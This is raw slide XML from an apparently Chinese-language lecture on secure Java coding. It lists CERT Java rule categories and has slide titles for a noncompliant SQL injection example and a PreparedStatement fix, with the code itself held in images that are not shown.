                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike"/>
                        <a:t>Serialization (SER)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>15.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS"/>
                          <a:ea typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                          <a:sym typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Platform Security (SEC)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="0E598C"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS"/>
                          <a:ea typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                          <a:sym typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>16.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike"/>
                        <a:t>Runtime Environment (ENV)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="357700">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="0E598C"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>17.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS"/>
                          <a:ea typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                          <a:sym typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Java Native Interface (JNI) </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>18.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Concurrency (CON) </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="0E598C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>49.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Trebuchet MS"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS"/>
                          <a:ea typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                          <a:sym typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Miscellaneous (MSC) </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="540500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="0E598C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>50.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS"/>
                          <a:ea typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                          <a:sym typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Android (DRD)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med"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3" name="Shape 103"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Shape 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>我們沒有要談密碼學！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>這不算談資訊安全！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>但軟體安全是資安的一部分！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>先談談軟體工程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Shape 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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42" name="Shape 442"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="443" name="Shape 443"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="767408" y="2101700"/>
            <a:ext cx="10896773" cy="4110459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Shape 444"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1199455" y="3789039"/>
            <a:ext cx="8280919" cy="648071"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="13725"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="BD4B48"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="39999" rotWithShape="0" dir="5400000" dist="20000">
              <a:srgbClr val="000000">
                <a:alpha val="37647"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="Shape 445"/>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IDS00-J. Prevent SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Shape 446"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="447" name="Shape 447"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1385764" y="1272306"/>
            <a:ext cx="10858500" cy="644524"/>
            <a:chOff x="601472" y="170031"/>
            <a:chExt cx="8420607" cy="797039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="448" name="Shape 448"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="601472" y="170031"/>
              <a:ext cx="8420607" cy="797039"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="022484"/>
            </a:solidFill>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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449" name="Shape 449"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="640866" y="209725"/>
              <a:ext cx="8341818" cy="717653"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="022484"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="318275" rIns="318275" tIns="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buSzPct val="25000"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="zh-TW" sz="2800">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Noncompliant  Code  Example</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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53" name="Shape 453"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Shape 454"/>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IDS00-J. Prevent SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Shape 455"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="456" name="Shape 456"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1199456" y="1340767"/>
            <a:ext cx="10858500" cy="504055"/>
            <a:chOff x="601472" y="170031"/>
            <a:chExt cx="8420607" cy="797039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="457" name="Shape 457"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="601472" y="170031"/>
              <a:ext cx="8420607" cy="797039"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="022484"/>
            </a:solidFill>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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458" name="Shape 458"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="640866" y="208777"/>
              <a:ext cx="8341818" cy="719549"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="318275" rIns="318275" tIns="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buSzPct val="25000"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="zh-TW" sz="2800">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Compliant Solution (PreparedStatement)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="459" name="Shape 459"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
